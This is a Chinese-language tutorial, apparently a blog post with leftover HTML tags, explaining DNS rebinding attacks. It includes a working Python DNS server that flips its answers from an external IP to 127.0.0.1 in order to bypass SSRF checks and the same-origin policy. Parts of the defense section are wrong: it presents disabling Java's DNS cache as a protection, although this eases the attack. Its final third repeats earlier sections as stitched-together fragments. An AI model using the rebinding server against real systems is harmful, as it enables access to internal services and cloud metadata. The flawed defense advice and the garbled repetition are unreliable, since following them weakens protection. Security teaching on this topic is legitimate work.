DNS重绑定攻击从原理到实践<\/h1>

0x00 前言<\/h2>
DNS重绑定攻击(DNS Rebinding)是一种利用DNS解析机制差异性的攻击技术，主要用于绕过同源策略(SOP)和SSRF(服务器端请求伪造)防护机制。本文将系统性地介绍DNS重绑定攻击的原理、实现方式及防御方法。<\/p>

0x01 DNS基础概念<\/h2>

DNS基本工作原理<\/h3>

DNS(Domain Name Service)是将域名和IP地址相互映射的分布式数据库系统，主要功能是将人类易记的域名转换为机器可识别的IP地址。<\/p>

DNS解析过程示例<\/strong>：<\/p>

客户端查询"zh.wikipedia.org"<\/li>
本地DNS缓存未命中则向根服务器查询<\/li>
根服务器返回.org顶级域服务器地址<\/li>
查询.org服务器获取wikipedia.org权威服务器地址<\/li>
最终从wikipedia.org服务器获取zh主机的A记录<\/li> <\/ol>
DNS记录类型<\/h3>

A记录<\/strong>：将主机名映射到IPv4地址<\/li>
CNAME记录<\/strong>：设置域名别名<\/li>
NS记录<\/strong>：指定域名的权威DNS服务器<\/li>
TTL(Time To Live)<\/strong>：DNS记录在缓存中的存活时间，单位为秒<\/li> <\/ul>
0x02 DNS重绑定攻击原理<\/h2>
核心概念<\/h3>
DNS重绑定攻击通过控制DNS服务器，在短时间内(通常TTL设为0)对同一域名返回不同的IP地址，从而绕过安全检查。<\/p>
典型攻击场景<\/strong>：<\/p>

第一次查询返回外网IP(如1.1.1.1)通过安全检查<\/li>
第二次查询返回内网IP(如127.0.0.1)实现内网访问<\/li> <\/ol>
攻击流程<\/h3>

用户访问恶意网站，执行JavaScript代码<\/li>
首次DNS解析返回允许的外网IP<\/li>
浏览器建立连接后，TTL过期<\/li>
后续请求重新解析，返回内网IP<\/li>
浏览器继续使用原有连接访问内网服务<\/li> <\/ol>
0x03 技术实现<\/h2>
构建可控DNS服务器<\/h3>
使用Python实现一个简单的DNS服务器，动态返回不同IP：<\/p>
from<\/span> twisted.internet import<\/span> reactor, defer <\/span><\/span>from<\/span> twisted.names import<\/span> client, dns, error, server <\/span><\/span> <\/span><\/span>record =<\/span> {} <\/span><\/span> <\/span><\/span>class<\/span> DynamicResolver<\/span>(object): <\/span><\/span> def<\/span> _doDynamicResponse<\/span>(self, query): <\/span><\/span> name =<\/span> query.<\/span>name.<\/span>name <\/span><\/span> if<\/span> name not<\/span> in<\/span> record or<\/span> record[name] <<\/span> 1<\/span>: <\/span><\/span> ip =<\/span> "104.160.43.154"<\/span> # 外网IP<\/span> <\/span><\/span> else<\/span>: <\/span><\/span> ip =<\/span> "127.0.0.1"<\/span> # 内网IP<\/span> <\/span><\/span> <\/span><\/span> if<\/span> name not<\/span> in<\/span> record: <\/span><\/span> record[name] =<\/span> 0<\/span> <\/span><\/span> record[name] +=<\/span> 1<\/span> <\/span><\/span> <\/span><\/span> answer =<\/span> dns.<\/span>RRHeader( <\/span><\/span> name=<\/span>name, <\/span><\/span> type=<\/span>dns.<\/span>A, <\/span><\/span> cls=<\/span>dns.<\/span>IN, <\/span><\/span> ttl=<\/span>0<\/span>, # 关键：TTL设为0<\/span> <\/span><\/span> payload=<\/span>dns.<\/span>Record_A(address=<\/span>b<\/span>'<\/span>%s<\/span>'<\/span>%<\/span>ip, ttl=<\/span>0<\/span>) <\/span><\/span> ) <\/span><\/span> return<\/span> [answer], [], [] <\/span><\/span> <\/span><\/span> def<\/span> query<\/span>(self, query, timeout=<\/span>None<\/span>): <\/span><\/span> return<\/span> defer.<\/span>succeed(self.<\/span>_doDynamicResponse(query)) <\/span><\/span> <\/span><\/span>def<\/span> main<\/span>(): <\/span><\/span> factory =<\/span> server.<\/span>DNSServerFactory( <\/span><\/span> clients=<\/span>[DynamicResolver(), client.<\/span>Resolver(resolv=<\/span>'\/etc\/resolv.conf'<\/span>)] <\/span><\/span> ) <\/span><\/span> protocol =<\/span> dns.<\/span>DNSDatagramProtocol(controller=<\/span>factory) <\/span><\/span> reactor.<\/span>listenUDP(53<\/span>, protocol) <\/span><\/span> reactor.<\/span>run() <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>: <\/span><\/span> main() <\/span><\/span><\/code><\/pre>域名配置要点<\/h3> 注册一个域名(如example.com)<\/li> 设置NS记录指向自建DNS服务器<\/li> 确保DNS服务器53端口可访问<\/li> <\/ol> 0x04 攻击实践<\/h2> 绕过SSRF防护<\/h3> 许多SSRF防护措施仅检查首次解析的IP地址。通过DNS重绑定：<\/p> 首次解析返回允许的外网IP<\/li> 后续请求返回127.0.0.1或其他内网IP<\/li> 实现对内网服务的访问<\/li> <\/ol> 绕过同源策略<\/h3> 通过控制同一域名解析到不同IP，可以绕过浏览器的同源策略限制。<\/p> 0x05 防御措施<\/h2> 有效防御方法<\/h3> 严格控制DNS TTL<\/strong>：<\/p> 设置合理的TTL值(建议≥10秒)<\/li> 确保两次DNS查询间隔小于TTL<\/li> <\/ul> <\/li> 应用层防护<\/strong>：<\/p> Java: 设置networkaddress.cache.negative.ttl=0<\/code><\/li> 禁用DNS缓存或使用固定IP白名单<\/li> <\/ul> <\/li> 网络层防护<\/strong>：<\/p> 防火墙限制外网到内网的连接<\/li> 监控异常的DNS查询模式<\/li> <\/ul> <\/li> <\/ol> 防御代码示例<\/h3> \/\/ Java中禁用DNS缓存 <\/span><\/span><\/span><\/span>java.<\/span>security<\/span>.<\/span>Security<\/span>.<\/span>setProperty<\/span>(<\/span>"networkaddress.cache.ttl"<\/span>,<\/span> "0"<\/span>);<\/span> <\/span><\/span>java.<\/span>security<\/span>.<\/span>Security<\/span>.<\/span>setProperty<\/span>(<\/span>"networkaddress.cache.negative.ttl"<\/span>,<\/span> "0"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>0x06 攻击局限性<\/h2> DNS缓存问题<\/strong>：<\/p> 某些公共DNS(如114.114.114.114)会忽略TTL缓存记录<\/li> 操作系统和浏览器可能有独立的缓存机制<\/li> <\/ul> <\/li> 时间窗口限制<\/strong>：<\/p> 需要精确控制攻击时序<\/li> 成功率受网络延迟影响<\/li> <\/ul> <\/li> 环境依赖性<\/strong>：<\/p> Java默认TTL为10秒，较难攻击<\/li> PHP默认不缓存，较易受攻击<\/li> <\/ul> <\/li> <\/ol> 0x07 扩展应用<\/h2> 内网渗透<\/strong>：绕过NAT访问内网服务<\/li> 云环境攻击<\/strong>：访问云metadata服务<\/li> 绕过WAF<\/strong>：逃避基于域名的防护规则<\/li> <\/ol> 0x08 参考资源<\/h2> 浅谈DNS重绑定漏洞<\/a><\/li> DNS Rebinding绕过SSRF限制<\/a><\/li> RFC 1034 - DNS协议规范<\/a><\/li> <\/ol> 通过深入理解DNS重绑定攻击原理和防御方法，可以有效提升Web应用的安全性，防止此类攻击带来的危害。<\/p>

DNS重绑定攻击从原理到实践<\/h1>

0x00 前言<\/h2> DNS重绑定攻击(DNS Rebinding)是一种利用DNS解析机制差异性的攻击技术，主要用于绕过同源策略(SOP)和SSRF(服务器端请求伪造)防护机制。本文将系统性地介绍DNS重绑定攻击的原理、实现方式及防御方法。<\/p>

0x01 DNS基础概念<\/h2>

0x02 DNS重绑定攻击原理<\/h2>

0x03 技术实现<\/h2>

0x04 攻击实践<\/h2>

绕过同源策略<\/h3> 通过控制同一域名解析到不同IP，可以绕过浏览器的同源策略限制。<\/p>

0x05 防御措施<\/h2>

0x08 参考资源<\/h2> 浅谈DNS重绑定漏洞<\/a><\/li> DNS Rebinding绕过SSRF限制<\/a><\/li> RFC 1034 - DNS协议规范<\/a><\/li> <\/ol> 通过深入理解DNS重绑定攻击原理和防御方法，可以有效提升Web应用的安全性，防止此类攻击带来的危害。<\/p>

0x00 前言<\/h2>
DNS重绑定攻击(DNS Rebinding)是一种利用DNS解析机制差异性的攻击技术，主要用于绕过同源策略(SOP)和SSRF(服务器端请求伪造)防护机制。本文将系统性地介绍DNS重绑定攻击的原理、实现方式及防御方法。<\/p>

绕过同源策略<\/h3>
通过控制同一域名解析到不同IP，可以绕过浏览器的同源策略限制。<\/p>

0x08 参考资源<\/h2>

浅谈DNS重绑定漏洞<\/a><\/li>
DNS Rebinding绕过SSRF限制<\/a><\/li>
RFC 1034 - DNS协议规范<\/a><\/li> <\/ol>
通过深入理解DNS重绑定攻击原理和防御方法，可以有效提升Web应用的安全性，防止此类攻击带来的危害。<\/p>